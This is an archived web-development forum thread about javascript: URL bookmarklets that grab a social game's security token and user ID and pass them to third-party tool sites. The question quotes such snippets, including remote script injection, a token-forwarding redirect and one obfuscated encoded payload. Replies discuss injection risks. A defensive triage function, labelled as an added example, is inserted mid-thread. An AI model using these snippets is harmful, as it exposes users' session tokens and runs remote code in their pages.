
javascript copy paste script


devWhiz


Can you guys point me in the right direction to where I could learn how to write a copy paste script

 

similar to this

 

http://mobstereffect.com/propertycalcfb

javascript: alert("The Mobsters Game should now take up the entire window.\n\t\t When window loads Follow Step4"); location.href="http://mobsters-fb-apache-dynamic-lb.playdom.com/prod_facebook/facebook/mobsters_v1/facebook_iframe.php?action=tab&target=3";

javascript: var a=SECURITY_KEY; var b=USER_ID; if(confirm("Success!!\nClick OK to sync your account with MobsterEffect.com")){ location.href="http://www.mobstereffect.com/syncfb.php?next=propertycalcfb&fid="+b+"&fkey="+a; }

javascript:function%20b(){a=document.createElement('script');a.src='http://mobstereffect.com/calc.js.php?next=propertycalc&';document.getElementsByTagName('body')[0].appendChild(a);}b();

 

also on

 

 

http://www.sumob.com/?i=iPlayCalculator

 

javascript:a=function(t,f,i,x,e,d){p=new Array();for(u=0;u<x.length;u+=2)p[t[u/2]]=x.substr(u,2);for(u=0;u<x.length/2;u++){q=p[u];if(p[u]+p[u+1]=='5c79'){q='5c'+i+f+d+'6e';u++;}if(p[u]+p[u+1]=='5c7a'){q='20';u++;}if(p[u]+p[u+1]=='5c78'){q='09';u++;}e+=i+f+d+q;}z=setInterval('y=setInterval(\''+e+';clearInterval(y);'+'\');clearInterval(z)')}('85/71/27/109/69/24/106/56/35/73/57/82/47/75/54/15/46/108/16/30/96/80/25/51/12/63/4/104/83/89/74/7/107/50/88/26/45/100/17/29/102/87/3/99/23/11/67/20/94/28/98/18/111/78/91/60/70/53/33/58/101/31/22/43/32/39/6/38/90/81/37/66/76/55/13/8/34/44/5/77/10/19/97/68/42/95/72/103/86/59/105/52/84/61/92/48/62/2/9/65/110/41/64/1/36/40/79/0/49/21/93/14/'.split('/'),'u','\\','2f2f6c6d70436e297273292f286d7464746f79613f6f68722e6363724a6f7565646354696e612e28684d6f4d646474706a642b61292e6c2e3a702e3b743d6e6d64656d746f6d61686f27626e636575623b70277465732f2e416161695373732772647427286c3d3d6545636473652e6f','','00')

javascript:function b(){d=document;d.body.appendChild(a=d.createElement('script'));a.src='http://sumob.com/JS/AMToolsO.js?'+Math.random()}b();

 

He encoded that,

 

and this

 

http://go4uteam.com/propcalc

 

javascript:function b(){a=document.createElement('script');a.src='http://go4uteam.com/js/calc.js?';document.getElementsByTagName('body')[0].appendChild(a);}b();

 

What these copy paste scripts do is: you open up the certain MySpace application, put the code in the toolbar and hit enter, and it finds the tokens for the application and connects to the tools that they have on their site. Where could I go to learn how to write these copy paste scripts to do the same thing and connect to my site to use my tools?

 

Thanks! :)

 

https://forums.phpfreaks.com/topic/239182-javascript-copy-paste-script/

What you're referring to as "copy paste scripts" is not really that, it's regular old JavaScript, which is getting injected into the page, called "JavaScript Injection", or simply "JSI"..

 

This is technically a form of maliciousness, but it can only affect whatever is on the page at this moment, it can, however, trick the browser into referring the user to another page which requires referrers to match up, that amongst other things like ad blocking, AJAX Referrer spoofing..

 

Using somebody else's JSI could lead to: stealing sensitive information from cookies and password forms, snooping on the content of the page, credit card theft, amongst other things, especially with browsers like chrome automatically filling in credit card information on focus and selection of a credit-card related field..

 

 

but to get back on point about your question, can you make this? Sure, if you know anything about javascript..

 

The only real rule you need to remember about javascript injection.. Is.

 

Rule: If anything you put in the url, returns any data to the "JavaScript:" portion of the url, it will then try and redirect you to that page.. An example of BAD JSI

 

E.X.: javascript:(Math.random()*11);

 

that will send you to a page: "10" which will most likely be a blank page.. or page not found

 

GOOD JSI (lol, how ironic is that phrase)

 

E.X.: javascript:void(x = 11, y = Math.random() * x, alert("Random * "+x+" = "+y));

 

void() will always return nothing..

  • 2 months later...
  Quote

This is technically a form of maliciousness, but it can only affect whatever is on the page at this moment, it can, however, trick the browser into referring the user to another page which requires referrers to match up, that amongst other things like ad blocking, AJAX Referrer spoofing..

 

Using somebody else's JSI could lead to: stealing sensitive information from cookies and password forms, snooping on the content of the page, credit card theft, amongst other things, especially with browsers like chrome automatically filling in credit card information on focus and selection of a credit-card related field..

 

 

On that note... There is also security in using JSI, for sites like mine, who help users by making tools for their game, it allows me to access their game security tokens and myspace ID, without directly asking for and using (and possibly storing) their myspace login. This allows for many useful things, such as calculating what it will take for a user to achieve a certain income within their game.

 

I do agree with you that there are many malicious sites and developers who use this for their benefit. On another note, if web browsers and developers were smart, they would store credit card numbers in a password field, and have a verify field, just like most sites do for a password. This way, when it is autofilled, even if someone tries to use JSI to take the CCN, it would just be a bunch of asterisks.

 

Another couple of options for JSI besides using the void() function are eval(), which triggers some virus programs, and just creating a blank function and running it, such as function b(){content to be run}b();

And last but not least, setInterval() and setTimeout() work as well.
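
A defensive check for the kind of snippet discussed in this thread, as an added example that is not part of any post: it classifies a pasted `javascript:` URL without executing it, flagging remote script loads, navigation, and string-to-code calls such as eval() or setInterval() with a string argument. The function name `triageJavascriptUrl`, the rule names and the `example.test` hosts are assumptions made for illustration.

```javascript
// Added example: static triage of a pasted "javascript:" URL. Nothing is executed.
'use strict';

// Constructed samples modelled on the snippet shapes quoted in this thread;
// the hosts are placeholders (example.test), not the sites named in the posts.
const SAMPLES = {
  loader: "javascript:function%20b(){a=document.createElement('script');" +
          "a.src='http://tools.example.test/calc.js?';" +
          "document.getElementsByTagName('body')[0].appendChild(a);}b();",
  redirect: 'javascript: var a=SECURITY_KEY; var b=USER_ID; ' +
            'location.href="http://sync.example.test/sync.php?fid="+b+"&fkey="+a;',
  timerString: "javascript:z=setInterval('doWork()',10)",
  benign: 'javascript:void(alert("hi"))',
};

// Hypothetical rule set: each entry is [finding name, pattern that triggers it].
const RULES = [
  ['remote-script-load', /createElement\(\s*['"]script['"]\s*\)/i],
  ['navigation', /\blocation(\.href)?\s*=|\blocation\.(assign|replace)\s*\(/i],
  ['string-to-code', /\beval\s*\(|\bnew\s+Function\s*\(|\bset(Interval|Timeout)\s*\(\s*['"]/i],
  ['reads-cookies', /\bdocument\.cookie\b/i],
];

function triageJavascriptUrl(pasted) {
  const m = /^\s*javascript:/i.exec(pasted);
  if (!m) return { isJavascriptUrl: false, findings: [], hosts: [] };
  let body = pasted.slice(m[0].length);
  // Browsers percent-decode a javascript: URL before evaluating it, so decode
  // first; otherwise %20-style escapes could hide a match from the rules.
  try { body = decodeURIComponent(body); } catch (_) { /* malformed escape: keep raw */ }
  const findings = RULES.filter(([, re]) => re.test(body)).map(([name]) => name);
  // Every absolute URL literal is a place where data or control can leave the page.
  const hosts = new Set();
  for (const u of body.match(/https?:\/\/[^\s'"<>)]+/gi) || []) {
    try { hosts.add(new URL(u).hostname); } catch (_) { /* not a parsable URL */ }
  }
  return { isJavascriptUrl: true, findings, hosts: [...hosts].sort() };
}

for (const [name, src] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(triageJavascriptUrl(src)));
}
```

An empty findings list only means none of these patterns matched; an encoded payload like the long one quoted in the first post hides its real source from any check of this kind until it is decoded.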

  • 1 month later...

sorry for replying so late, been really busy lately.. I'd like to point out, that JSI on a password field, does yield the correct information, not asterisks, unless I read you wrong.

 

Again sorry late reply lol. *feels like a post necromancer*

Archived

This topic is now archived and is closed to further replies.
